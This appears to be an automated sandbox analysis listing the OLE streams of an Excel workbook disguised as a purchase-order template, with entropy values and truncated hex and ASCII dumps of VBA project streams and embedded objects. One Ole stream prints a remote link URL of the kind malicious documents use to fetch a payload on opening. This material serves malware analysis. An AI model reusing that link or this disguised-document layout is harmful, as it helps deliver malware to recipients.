                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/\x5DocumentSummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:244
                                                                Entropy:2.701136490257069
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/\x5SummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:220
                                                                Entropy:3.372234242231489
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD0018D4CE/\x1Ole
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:20
                                                                Entropy:0.5689955935892812
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD0018D4CE/\x3ObjInfo
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:4
                                                                Entropy:0.8112781244591328
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . .
                                                                Data Raw:00 00 03 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD0018D4CE/Contents
                                                                CLSID:
                                                                File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                Stream Size:197671
                                                                Entropy:6.989042939766534
                                                                Base64 Encoded:True
                                                                Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD0068D442/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.219515110876372
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD0068D442/Package
                                                                CLSID:
                                                                File Type:Microsoft Excel 2007+
                                                                Stream Size:26243
                                                                Entropy:7.635433729726103
                                                                Base64 Encoded:True
                                                                Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.25248375192737
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/\x5DocumentSummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:248
                                                                Entropy:3.0523231150355867
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/\x5SummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:256
                                                                Entropy:4.086306928392587
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/Workbook
                                                                CLSID:
                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                Stream Size:134792
                                                                Entropy:7.974168320310173
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                                                                CLSID:
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Stream Size:468
                                                                Entropy:5.269289820125323
                                                                Base64 Encoded:True
                                                                Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                                                                Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:83
                                                                Entropy:3.0672749060249043
                                                                Base64 Encoded:False
                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:2486
                                                                Entropy:3.9244127831265385
                                                                Base64 Encoded:False
                                                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:536
                                                                Entropy:6.330646364694152
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                General
                                                                Stream Path:MBD0004282B/MBD00726B69/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.219515110876372
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/MBD00726B69/Package
                                                                CLSID:
                                                                File Type:Microsoft Excel 2007+
                                                                Stream Size:26242
                                                                Entropy:7.635424485665502
                                                                Base64 Encoded:True
                                                                Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282B/Workbook
                                                                CLSID:
                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                Stream Size:283872
                                                                Entropy:7.743278150467805
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                General
                                                                Stream Path:MBD0004282C/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:99
                                                                Entropy:3.631242196770981
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282C/Package
                                                                CLSID:
                                                                File Type:Microsoft Excel 2007+
                                                                Stream Size:45934
                                                                Entropy:7.5587990853484195
                                                                Base64 Encoded:True
                                                                Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0004282D/\x1Ole
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:890
                                                                Entropy:5.0045676775275
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . X . # u . . . . . . . . . . . . . b . . . y . . . K . ^ . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . V . R . i . d . c . b . r . t . v . 4 . ? . & . h . e . l . i . u . m . = . e . a . r . s . p . l . i . t . t . i . n . g . & . p . a . s . t . a . = . v . e . r . d . a . n . t . & . m . i . r . r . o . r . = . x . - . r . a . t . e . d . & . g . a . p . = . b . r . a . s . h . & . l . i . f . e . = . f . l . u . f . f . y . & . v . e . r . a . n . d . a . .
                                                                Data Raw:01 00 00 02 fd 92 58 7f 23 96 75 0c 00 00 00 00 00 00 00 00 00 00 00 00 62 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 5e 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 56 00 52 00 69 00 64 00 63 00 62 00 72 00 74 00 76 00 34 00 3f 00 26 00 68 00 65 00 6c 00 69 00 75 00 6d 00 3d 00 65 00
                                                                General
                                                                Stream Path:Workbook
                                                                CLSID:
                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                Stream Size:297191
                                                                Entropy:7.998434037701883
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . 5 W B # . . . - . Q . a B f m w . Z . W . . . R . . . . . . . | K . . . \\ . p . . . { . C . N T . & r X . e Q . y O e [ . ( F ` ! . E / . ( N D . - . 7 . . < . . ` & t " u C u / B . R . . . f * f . B . . . @ C a . . . U . . . = . . . . 0 . . . . V ) . I ` . o w . . . . . . . . . . . . . . . . . 4 f . . . . . . . . # . = . . . o . . S . . b e . t r @ . . . . . . . + " . . . . . . . v v . . . . . . 1 . . . D . - = d ] . = . , . I ^ 1 . . . 2 W + ; . . ,
                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 8c f8 35 57 c2 42 23 d5 94 fd 1c 00 d0 2d 9c 18 8c b2 51 e9 05 be a5 d3 61 fd e6 42 66 6d 77 b5 0a 5a cf 8f 57 b7 1e e8 f0 f0 f1 04 d2 ca 8e 52 e1 00 02 00 b0 04 c1 00 02 00 7c 4b e2 00 00 00 5c 00 70 00 11 90 bd 10 7b d7 02 80 43 f8 09 bc f5 4e a7 54 19 86 26 93 cf 72 58 1a 65 51 00 ee 79 a8
                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                CLSID:
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Stream Size:521
                                                                Entropy:5.240199056368986
                                                                Base64 Encoded:True
                                                                Data ASCII:I D = " { D 4 3 1 4 0 4 0 - 7 C 8 2 - 4 0 1 0 - 9 2 0 F - 9 B 7 7 A B C 1 0 E 4 D } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 1 C 3 6 6 6 E 6 A 6 E 6 A 6 E 6
                                                                Data Raw:49 44 3d 22 7b 44 34 33 31 34 30 34 30 2d 37 43 38 32 2d 34 30 31 30 2d 39 32 30 46 2d 39 42 37 37 41 42 43 31 30 45 34 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:104
                                                                Entropy:3.0488640812019017
                                                                Base64 Encoded:False
                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:2644
                                                                Entropy:3.9930444249426587
                                                                Base64 Encoded:False
                                                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
